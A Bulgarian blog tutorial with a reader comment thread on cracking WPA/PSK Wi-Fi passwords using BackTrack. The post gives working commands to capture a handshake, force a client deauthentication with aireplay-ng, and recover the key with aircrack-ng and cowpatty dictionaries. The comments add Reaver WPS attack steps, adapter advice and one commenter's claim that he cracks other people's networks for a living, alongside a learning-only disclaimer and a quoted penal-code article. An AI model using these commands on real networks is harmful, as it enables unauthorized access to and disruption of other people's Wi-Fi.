Здравейте отново с мен Мартин Петров. Предния път ви демонстрирах как се разбива Wireless с WEP, а сега ще ви обясня как се разбива Wireless с WPA/PSK.
За целта ще използваме live дистрибуцията BackTrack 4 и приложенията в нея .
След като сме заредили нашият BackTrack ще отворим терминал за да подготвим нашият мрежови интерфейс за работа в режим мониторинг
# iwconfig wlan0 mode monitoring
След като настроихме мрежовият ни интерфейс сега ще сканираме за wireless мрежа която да компрометираме с учебна цел
# airodump-ng wlan0
Понеже търсим wireless със WPA кодиране,а тук виждаме такъв прекратяваме с Контрол и C. Wireless мрежата която ще използваме ще бъде "mpetrov_net" на шести канал.
След като избрахме коя мрежа да използваме и видяхме, че тя работи на шести канал е време да пуснем в Терминал 2 airodump за да събирем информация за съответната мрежа.
# airodump-ng -w wpa -c 6 --bssid 00:23:CD:D7:84:FC wlan0
Сега ще отворим Терминал 3 за да изпратим пакети за ре- оторизация. Ще трябва да използваме MAC адреса на клиента които можем да вземем от Терминал 1.
# aireplay-ng -0 1 -a 00:23:CD:D7:84:FC -c 00:1A:73:87:B4:E9 wlan0
След това ще погледнем Терминал 2 и ще видим горе в дясно WPA handshake: 00:23:CD:D7:84:FC с което приключваме събирането на пакети и пристъпваме към кракване на паролата.
За кракване на паролата ще използваме два метода единият е, чрез aircrack, а другият , чрез cowpatty
Първо ще реализираме кракване с aircrack
cd /pentest/wireless/aircrack-g/test
aircrack-ng -w password.lst /root/wpa-01.cap
Сега ще направим кракване с cowpatty:
cd /pentest/wireless/cowpatty
./cowpatty -r /root/wpa-01.cap -f dict -s mpetrov_net
И двата метода успяват да кракнат паролата и да я изведат.
Видео демонстрация от youtube.com: Разбиване на Wireless с WPA encoding (youtube)
Видео демонстрация от vbox7.com: Разбиване на Wireless с WPA encoding (vbox7)
Надявам се, че този видео материал ще бъде използван и интерпретиран единствено с учебна цел.
До скоро от mpetrov.net
PS: Това е истината-> EPRB
Според нашия Наказателен Кодекс манипулирането на wireless мрежи е незаконно:
Чл. 212а. (Нов -- ДВ, бр. 92 от 2002 г.) (1) (Изм. -- ДВ, бр. 38 от 2007 г.) Който с цел да набави за себе си или за другиго облага възбуди или поддържа заблуждение у някого, като внесе, измени, изтрие или заличи компютърни данни или използва чужд електронен подпис и с това причини на него или на другиго вреда, се наказва за компютърна измама с лишаване от свобода от една до шест години и глоба до шест хиляди лева.
(2) (Изм. -- ДВ, бр. 38 от 2007 г.) Същото наказание се налага и на този, който, без да има право, внесе, измени, изтрие или заличи компютърни данни, за да получи нещо, което не му се следва.
Вместо да правите такива гимнастики проосто си платете интернета и ще го имате винаги.
Разбиване на Wireless с WPA encoding,
Здравейте,
бих желал да получа малко повече информация за хакването на wifi мрежа през wpa/wpa2. Имам back track 4 boot dvd, но когато зареждам посочените команди:# iwconfig wlan0 mode monitoring ми изписва: Error for wireless request "Set Mode" (8B06) :
SET failed on device wlan0 ; No such device.
Извършвам операцията на лаптоп dell INSPIRON 1520. Wifi хардуера е включен. Моля за помощ.
Имам проблем.. След като напиша:
iwconfig wlan0 mode monitoring;
airodump-ng wlan0 " ми изписва следното:
Interface wlan0:
ioctl (SIOCGIFINDEX) failed: No such device..
Като напиша само: iwconfig ми изписва това:
lo: no wireless extensins
eth0 no wireless extension
Писах също и: /etc/init.d./networking start и нищо не стана… Ако може някой да помогне да пише..
Здравеите,ако може някои да помогне правя вси4ко в терминал 1ив 2 терминал като напи6а командата която е написал Мартин ми изписва {bash} daite sawet 2sedmici nemoga da se oprawq.
@Icepro
i az sam s sushtiq problem do kolkoto go razbiram az sam s backtrack 5 podkaran pod vmware instalirah vmware tools tukmo obache tyk zaciklih gledah iz neta che na vmware vrazvat vunshi adapteri a nemoje li da go nakram nqkak si da mi prochete vgradenata v lap topa bejichna karta za net koqto e Intel® Wireless LAN 802.11a/b/g …..
i az sam s sashtiq problem otvariqm go prez vmware workstation i taka………….
bt ~ # iwconfig wlan0 mode monitoring
Error for wireless request "Set Mode" (8B06) :
SET failed on device wlan0 ; No such device.
ei tva mi izliza i do tam na nikade nqma razvitie kvo da praq?
всички сме с еднакъв проблем и най- лощото че от толкова българи-разбирковци по форумите няма кой да ни помогне
zdraveite imam problem sas back track 5 pravq vsi4ko kakto e dadeno v you tube diska mi zarejda sled KOMANDATA :STSRTX i dotam ako nqkoi moje da mi pomogne 6te mu bda blagodaren 6te 4erpq mnogo ostavqm skype za vrazka s men skype:genoovv2 skype: radio-genov
Момчета, Бактрака без значение, коя версия имате под ръка е Линукс дистрибуция -- на Уиндоус можете да го подкарате като използвате VMware Workstation или VMware Player. Workstation е с повече възможности, а и като се огледате малко ще намерите "с какво да завъртите стартера". Препоръчвам ви да използвате Бактрак 5 GNOM или в краен случай 4ката. За Бактрак 5 -- в зависимост от процесора ви изберете 32б или 64б. За по-старите и сингъл процесори ви е нужна 32б версия на бактрак. Има много инфо за това как да си инсталирате бактрака -въпреки това забелязах някои моменти, които е добре да се отбележат наново. За харда 8Г са малко -- след като инсталирах инструментите останах със смешно малко пространство. За Харда -- 16г. Адаптера ви трябва да е Bridged и маркирайте отметката под него също. Паметта ви трябва да е 1024мб. Лично се поизпотих при инсталацията на инструментите, но няма невъзможни неща…ако е нужно ще напища друг пост за самата инсталация на инструментите, които са в tar.gz формат познат още като tarblan. За да ви работи бактрака с всичките си екстри и добавки -- най добре е да си го инсталирате на харда. Друг важен момент -- според мен най-важният за да ви работи Бактрака под мониторинг мод е именно: VMware Workstation или VMware Player работят изключително и основно с външни антени, като най-добрата за тези изпълнения, както повечето знаят е ALFA NETWORK. Поръчва те си я по Ибей. Моята е Alfa Networks AWUS036NH 2w и се държи подобаващо. От usb флашка или диск също може да се подкара Бактрак -- настройвате от биоса да бутва от където трябва,… но пак искам да подчертая за да работи на мах трябва да е инсталиран на харда. Има още много да се пише за кодовете/командите, докато се подкара машината, но нека да оставя това на градският си Мартин.П -- все пак това е неговият блок. Използвайте Бактрак само със учебна цел -- ние българите плащаме един от най-ефтеният интернет в цяла европа , така че платете си интернета и не се занимавайте с глупости…
zna4e toka koeto demostraciata na marin petrof si4ko tova e laja poneje imam preiateli po mnogo strani i ne samo as sme opitvali backtrack 4 no toi ne raboti nesi gobete vremeto tarsete druk na4en
Здравей Авторе, имам един въпрос. Бих искал да знам кой точно backtrack трябва да сваля, защото преди ден-два пробвах със един който е 1 гигабайт и нещо и с него не стана -- не ми излизат терминалите, а и като въведа първата команда дава някаква грешка. Та въпросът ми е следният -- в ЗАМУНДА има 1 back trak-a и сега съм на път да сваля този, който е 10.02 GB. Ще свърши ли работа той, или не?
Само да добавя, че съм с windows 7 и съм инсталирал и подкарал VirtualBox и с него зареждам Back Track-a.
Предварително благодаря!
Абе пич, аз що ли така пък нямам никви проблеми с Backtrack 5 RC2 използвайки гореописаните методи? Тва, че ти и твоите приятели сте некадърници и не можете да се справите изобщо не означава, че автора лъже. Щот абсолютно същото си го пише и по форумите и сайтовете посветени на работа с този софтуер.
daaaaaaaaa
Wpa e igra4ka 've4e ,3 butona i 10 chasa 4akane i gotovo ,vlizam tuk samo zada se smeq s komentari i maloumnici . Blagodarnosti na free-wifi
Чудя се вече на 3-4 мрежи паролата, която ми калкулира aircrack няма нищо общо с истината и защо всички пароли колкото и безмислени да излизат са ограничени до 8 букви( досега цифри не са ми излизали )? И така и не пасна нито една парола.
Здравейте имам елементарен вапрос не е много сложен стартирам си бак-трак-а 4 който е даден по-горе стигам почти до финала но там кадето трябва на даденият рутер да ми изкара handshake -а не ми излиза и това ме спъва следкато си напиша aircrack-ng и т.н. ми дава грешка 0 handshake :( какво може да е това ??? Благодаря предварително за помощта всичко хубаво
Handshak-а ми излезе обаче нито със aircrack нито със cowpatty не излиза паролата явно наистина както казахте по-горе всичко е лъжа и измама :(
abe hora zdr neznam za vas no zashto ne opitate s wifislax 4.2
@yanko
abe ne znaq, pri men se poluchava. za wep nqma nikakyv problem, daje, kogato rutera mi e blizo, ot ima nqma 1000 data pack mi pokazva parolata.
kakto i da e, tova e qsno. iskam da popitam oba4e ot kade moga da si namerq hubav pass list za wpa? porovih baq i nishto ne namiram.
HI AZ IZPOLZVAM BEINI 1.2.1
NIAMAM PROBLEM DA HVANA WEP
NO NE MOGA DA DA HVANA WPA ILI WPA2
POMO6T.
POMOSHT!!!! pri poslednata komanda za iskarvaneto na pass-a mi izliza tova saob6tenie NEXT TRY WITH 5000 IVs. nqkoi znaeli za kakvo stava na v1pros ?
За да стане работата за wep-a, wifi картата трябва да поддържа мониторинг и инжекция. Аз предпочитам тези на Alfa (тествайте я първо с драйверите от сайта им, за да знаете че е оригинална, има много ментета). Голяма част от wifi картите нямат тези опции.
Бактрак си е за начинаещи и най-мосово се ползва заради хакването на wep-a. Става много по-бързо (2-3мин, особено ако имаш Alfa).
За wpa-то си е чист късмет. Понякога става (ако имат тъпа парола като 1234567890).
zdraveite na vsi4ki zna4i az imam sledniq problem i shte buda mnogo blagodaren ako nqkoi moje da mi obqsni kak da go resha :) zna4i problema mi e sledniq smenih backtrack 3,4, i 5 oba4e problema si ostana ne reshen kogato napravq handshake s dadena mreja i trugna da pisha komandata cd/pentest/wireless/aircrack-g/test prosto v koznolata izliza 4e ne e namerena direktoriqta probvah sus backtrack 3 final sledtova sus 4 pre releas i sus 5 r3 gnome x86 mashinata na koqto rabota e dell latitude d610 predvaritelno blagodarq za pomoshta :)
Не се заблуждавайте синковци. Онези, които не могат да подкарат wlan0, означава, че трябва да си намерят външна с ralink драйвери. Поне тези стават със сигурност. Знам го от личен опит и понеже с това си изкарвам прехрана в Испания, бая wpa и wpa2-та съм хакнал. Естествено има доста фактори на които трябва да обърнеш внимaние когато го правиш и… не всички мрежи са лесно достъпни. PWR -- Интервенцията на Beacons и не на последно място Data пакетите. Kоито са основни фактори, когато искаш да си (гепиш) нечия WPA WPA2-PSK паролка.
За момента най-добрият начин да го направите, е да използвате Reaver метод, който ВИ ГАРАНТИРАМ, че става, но отнема доста време (в повечето случаи)
Имал съм случаи на 10сек, 15 мин, 40 мин застой и БАМ. Веднъж ми отне 34 часа… Търпение му е майката. С Reaver става, това е факт.
И що се отнася до WPA Diccionarios, то все едно да улучиш 6-ца от тото-то. Не че не става, но ако паролата не е там, ще пипнеш един гол и чисто и просто губене на верем.
Ай, със здраве :>
Абе всичко си работи ама ако паролата е символи я кажете какво се получава тогава и ако я няма в листа ;)
Lacho poneje kazva6 che ti e pusnat wi-fi trqbva da go spre6 za da ti go startira v rejim monitor
Kato q nqma svalqi si wordlisti i gi proverqvai v tqh dali ima to daje Martincho ima tema kak po barzo moje da gi scanira ako go golemi na razmer.
Здравейте.Качих си програмата Бактрак5 и се опитвам да я подкарам но стигам до някъде и не се получава.В смисъл,че програмката не може да се свърже с чипа на адаптора който ползвам.Гледам един клип в интернет и виждам че са съвместими,но си мисля че трябват някакви драйвери,но не знам от къде да ги изтегля.Моля за инфо.Модела на адаптора е Alfa AWUS 036NH.Програмата е Back Track5R1.Предварително благодаря.
Първо BackTrack 5 R3 не е програма, а е Ubuntu 10.04 базирано на Debian. Забрави BackTrack 5 R3 … Ползвайте Kali Linux
Пичове първо научете какво е pc,hard,soft,win,Linux,едва тогава ще имате успех,искате да пиете мляко,но нямате крава
Програмата backtrack5,xax,po dobre si go platete neta
pi4ove az sum s backtrack 5 gnom problema mi e 4e ne moga da podkaram reaver molq pomosht
Iskam da pitam dali moje da se polzva tova http://mpetrov.net/audit-na-wpa-parola-chrez-aircrack-i-sqlite za Beini? I koi wordlist se izpolzva otkade se tegli?
Здравейте, кода cd /pentest/wireless/aircrack-g/test
aircrack-ng -w password.lst /root/wpa-01.cap
важи ли за декриптиране на криптирания ключ но с програмата wifiway? Бихте ли обяснили за нея как става за wpa и wpa2. За wep няма проблем всичко е успешно но като опитвам за wpa , започва да събира пакети, има wpa handshake горе в дясно. Изчаквам на data да покаже поне 60000 и нататък не излиза както при wep. Къде греша? Да напиша ли този код? Благодаря.
Слушаите пичове наи голям успех ще имате с beini 1.2.2 чрез reaver,но само на рутери с включен
wps.Независимо от вида на криптиране wep,wpa,wpa2/wpa-psk.В beini влизате в minidwep gtk. ,избирате наи горе първо нет адаптера-картата,по-долу какъв метод криптиране и натискате skan ,след като излязат мрежи избирате мрежа на която в края пише- wps натискате бутон reaver след което ви пита коя карта искате да зададете wlan0 ili wlan1-тъи като аз съм с тази на лаптопа и отделно на антената,,ALFA,,във вашия случай може да сте само с wlan0 -тази на компа.И така давате ok за да потвърдите мониторинга после още веднъж ok и от тук нататък е въпрос на време.Може 10сек ,а може и 20 часа,но с добра антена и добра връзка не повече от 3-4 часа при по сложни wpa/wpa2 пароли,но за сметка на това кода лъсва на 100 процента.Дано съм помогнал.. ..
Nqkoi ako mi pomogne da podkaram linuxa pod windows bih mu pomognal s razbivaneto zashtoto moga i zn kak skype : ctpacthuat
Първо, вижте какъв Wireless network interface имате свързан, и как е означен[wlan0; wlan1; Vwlan0 и т.н.]
Поздрави :)
backtrack 5 ima li vgraden wordlist ,ili se svalq ,v sastoqnie rar li se poso4va
Момчета, нищо не разбирам от хакерство и нямам никакво намерение тепърва да се уча! Просто вчера се исзипаха един тон полицаи ГДБОП, Европол и каквото се сетите в къщи, само защото моето IP излязло в Скайпа на някакв бастун, който записвал карти във Франция -- бил изпращал криптирани данни към моето IP. Рутера ми е настроен както "аксес пойнт" и имам контрол по мак адрес на компа от страна провайдера. "Разбиркото_експерт" от Европол твърди, че било много трудно, до невъзможно да ме хакнат с такава защита (провериха ми всички електронни устройства в къщи и не откриха нищо за което да се хванат) и извършителя съм аз. Рутера ми е Gigabite, а криптирането е WPA2. нямам парола на мрежата -- канектвам се автоматично. Моля -- искам просто един линк към тутриал и или нещо подобно, за да им покажа на тези леваци, че са 15 години назад. Благодаря предварително!
99% от Вас не разбират нищо от тази статия. като папагали повтаряте написаното. няма смисъл! няма да стане така. а дори и да дъпнете пакетите, откриването на парола по този начин обикновенно е безнадежна задача, освен ако паролата не е от рода 12345678. но тогава по добре опитайте на ръка. пак ще е по бързо.